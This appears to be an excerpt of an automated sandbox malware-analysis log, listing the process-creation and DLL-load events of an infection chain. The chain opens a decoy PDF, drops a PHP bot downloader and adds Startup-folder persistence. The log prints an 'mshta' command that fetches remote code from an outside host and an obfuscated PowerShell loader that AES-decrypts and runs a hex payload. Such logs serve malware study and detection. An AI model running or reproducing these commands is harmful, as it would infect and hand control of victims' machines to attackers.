        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = 'CC0D32DBB8F2AEAAAD367283309458E20D13E54AE9F93C26DBBAD73293BD50A36D9574E1A9FCCBBE98A49FC7AA50C3C051F3CBAE9B99771F9B3471A8B7406647B45710656B9560F816F99C52E5CD056E94BB343C78DECD912750ECF5C120A3C6120F92F9AB407C779692B2B801886D4C1933853B818B2F4ACBF254531544A97C461534F8989BDBE763C47BD13A5027B3175BDB8C0BA73400B08CB34FF3383856710CB6019243D1C36B39D01C9442DBEB89528D749444614EA6F3A125CFDB0B5CB39EA903AD087683829FAE488C94736BC882DFA6F1B5BADE602DC13EA4A71F59C0C555E4AA6CC495A964CEE240BAC2F3D429AA98692B0BF989429E291DCF520A3167A6D7D554A48ED1EC98E1F71AA758670750C98404FB140B70E6F8CE88015D69E8D0F3FCF7F737F074F810905C0DD5FD37726F325B89CC02C3B0CD71DD28A101A9080999F615A7AF33942A1FEAF9033FFB3CB02D88C83CEA4BEB13D36CCCDE536D2D4EA38EA00E492838E3E78EE9C0CA9DBC405A5C6F049999533FD9F5FA7404801734E8378978546AAF5D84956D74F1C451D373B86F3488593922F15AEE13BA02471A9C112CEDF4833B3F0638A4A8CECD1D52E9714EA9EDEB5E32944EB33FE52FB8A4B556B1DA6183E48183ACE760AE01310141F680BF3D33446801FC2BFD3000C1BDD51A6E8F30AA8A9B5C8BFBB555A5C04AC12A81509772CE127CB8598C525EBA2A091166AA250CCC96785ABD72973ECED6924E22C09BD25C868452073029B96D7C754E3D74FDF15E08C2A0F4C53F93F39EC3F0FD965A188FDF13D042BBC47CF96138A70FAB9162E32734D3C137CC3A4D27DB5363F9FA5F59ECAC5ADF283B806C00431D7D240795F83F85010F571088B246CEEDC36DADA39641C871CCD8E775017B5A338D1D94E045C140E05F8F86DB296BFFD092C327B31BB3D19F8C1B5B5EFBFD54647ABB292A0F16D86139B074238F1AB2638E0A3034AC7C00056A6E988B63A360B70DCBCDFD1A98A7DE9D02F1760C98DEFEFD55748A81631DD8336CCBC8BDB9784FDC8ED2398FADF660B1349E919FD6497D31A84903C8649BB847B3734E51D3C9ABDFA5BBE03A6CA0E3EC6A9ABB6054F6EB3DE0B804173A9DFDFD85C03FBB3DD4CD7152D30D13AF80E4BC2D9D561DB494C445384AF14A71AF67A3F252F2BAB0EB8A399A9F3DE478EE0920E4F717E63A195E6394FFD001BEFEED37566A40C55DC5CF48EF42822AD3876834FF7F2C41AA52134D41CE152176D5FBC298F91AF4E5C2ADB1486720693646536D8308BF068787AEE0EED268732FA76B22C73A43EEC2E677B595D575F1EDD71FAEC18238660E9D88409FA932407116BB516B6340B888E6FF5C5E303826F793F4E87135C2D9D20886EB5FCFC42C0D9603B67C13BBE82488090447CE2D406BCE4F71F8DED1277FB46A3F2E9FEB147880DEF6AD74481A95C5A94D480FA6742D967332B49570E903748A0BC475D54F8A4C548412C4AE30767A66A97B5BCFEE2DCB02BD3B11FA82EA1D214EA6520580B2DDF1FACDAD83B1921E52658D688B42F0DC0F163134922A308D66702D2E0ABFC978ECCE276FD6423CFF201D4169303D1FEE518BF422FDA896E2625653444DDB524D1779473C3EF10919F817A39FEBE05CE776ACD3EEB5F6529FC14DA7797DC617900100111D543A4680515798A7EB47B4C3C8F79DA82C90F0A61ADCC29B3FFCB05F9F13ECC10A907A9F8FD908476EA00AAE8E8631736D715947485271496F5853536B744B';function wLh ($iUUDD){return -split ($iUUDD -replace '..', '0x$& ')};$feiFxp = wLh($ddg.SubString(0, 2464));$zXe = [System.Security.Cryptography.Aes]::Create();$zXe.Key = wLh($ddg.SubString(2464));$zXe.IV = New-Object byte[] 16;$QlaSHZgH = $zXe.CreateDecryptor();$PwiNROQ = [System.String]::new($QlaSHZgH.TransformFinalBlock($feiFxp, 0,$feiFxp.Leng
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Professional_Social_Media_Report.pdf"
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1720,i,17340846460468953801,1805849140092646528,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe "C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe"
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C tar -xf "C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64.zip" -C "C:\Users\user\AppData\Roaming"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tar.exe tar -xf "C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64.zip" -C "C:\Users\user\AppData\Roaming"
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://myfilebuilders.com/samm"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://myfilebuilders.com/sammJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = 'CC0D32DBB8F2AEAAAD367283309458E20D13E54AE9F93C26DBBAD73293BD50A36D9574E1A9FCCBBE98A49FC7AA50C3C051F3CBAE9B99771F9B3471A8B7406647B45710656B9560F816F99C52E5CD056E94BB343C78DECD912750ECF5C120A3C6120F92F9AB407C779692B2B801886D4C1933853B818B2F4ACBF254531544A97C461534F8989BDBE763C47BD13A5027B3175BDB8C0BA73400B08CB34FF3383856710CB6019243D1C36B39D01C9442DBEB89528D749444614EA6F3A125CFDB0B5CB39EA903AD087683829FAE488C94736BC882DFA6F1B5BADE602DC13EA4A71F59C0C555E4AA6CC495A964CEE240BAC2F3D429AA98692B0BF989429E291DCF520A3167A6D7D554A48ED1EC98E1F71AA758670750C98404FB140B70E6F8CE88015D69E8D0F3FCF7F737F074F810905C0DD5FD37726F325B89CC02C3B0CD71DD28A101A9080999F615A7AF33942A1FEAF9033FFB3CB02D88C83CEA4BEB13D36CCCDE536D2D4EA38EA00E492838E3E78EE9C0CA9DBC405A5C6F049999533FD9F5FA7404801734E8378978546AAF5D84956D74F1C451D373B86F3488593922F15AEE13BA02471A9C112CEDF4833B3F0638A4A8CECD1D52E9714EA9EDEB5E32944EB33FE52FB8A4B556B1DA6183E48183ACE760AE01310141F680BF3D33446801FC2BFD3000C1BDD51A6E8F30AA8A9B5C8BFBB555A5C04AC12A81509772CE127CB8598C525EBA2A091166AA250CCC96785ABD72973ECED6924E22C09BD25C868452073029B96D7C754E3D74FDF15E08C2A0F4C53F93F39EC3F0FD965A188FDF13D042BBC47CF96138A70FAB9162E32734D3C137CC3A4D27DB5363F9FA5F59ECAC5ADF283B806C00431D7D240795F83F85010F571088B246CEEDC36DADA39641C871CCD8E775017B5A338D1D94E045C140E05F8F86DB296BFFD092C327B31BB3D19F8C1B5B5EFBFD54647ABB292A0F16D86139B074238F1AB2638E0A3034AC7C00056A6E988B63A360B70DCBCDFD1A98A7DE9D02F1760C98DEFEFD55748A81631DD8336CCBC8BDB9784FDC8ED2398FADF660B1349E919FD6497D31A84903C8649BB847B3734E51D3C9ABDFA5BBE03A6CA0E3EC6A9ABB6054F6EB3DE0B804173A9DFDFD85C03FBB3DD4CD7152D30D13AF80E4BC2D9D561DB494C445384AF14A71AF67A3F252F2BAB0EB8A399A9F3DE478EE0920E4F717E63A195E6394FFD001BEFEED37566A40C55DC5CF48EF42822AD3876834FF7F2C41AA52134D41CE152176D5FBC298F91AF4E5C2ADB1486720693646536D8308BF068787AEE0EED268732FA76B22C73A43EEC2E677B595D575F1EDD71FAEC18238660E9D88409FA932407116BB516B6340B888E6FF5C5E303826F793F4E87135C2D9D20886EB5FCFC42C0D9603B67C13BBE82488090447CE2D406BCE4F71F8DED1277FB46A3F2E9FEB147880DEF6AD74481A95C5A94D480FA6742D967332B49570E903748A0BC475D54F8A4C548412C4AE30767A66A97B5BCFEE2DCB02BD3B11FA82EA1D214EA6520580B2DDF1FACDAD83B1921E52658D688B42F0DC0F163134922A308D66702D2E0ABFC978ECCE276FD6423CFF201D4169303D1FEE518BF422FDA896E2625653444DDB524D1779473C3EF10919F817A39FEBE05CE776ACD3EEB5F6529FC14DA7797DC617900100111D543A4680515798A7EB47B4C3C8F79DA82C90F0A61ADCC29B3FFCB05F9F13ECC10A907A9F8FD908476EA00AAE8E8631736D715947485271496F5853536B744B';function wLh ($iUUDD){return -split ($iUUDD -replace '..', '0x$& ')};$feiFxp = wLh($ddg.SubString(0, 2464));$zXe = [System.Security.Cryptography.Aes]::Create();$zXe.Key = wLh($ddg.SubString(2464));$zXe.IV = New-Object byte[] 16;$QlaSHZgH = $zXe.CreateDecryptor();$PwiNROQ = [System.String]::new($QlaSHZgH.TransformFinalBlock($feiFxp, 0,$feiFxp.LengJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Professional_Social_Media_Report.pdf"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe "C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe" Jump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1720,i,17340846460468953801,1805849140092646528,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C tar -xf "C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64.zip" -C "C:\Users\user\AppData\Roaming"
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tar.exe tar -xf "C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64.zip" -C "C:\Users\user\AppData\Roaming"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
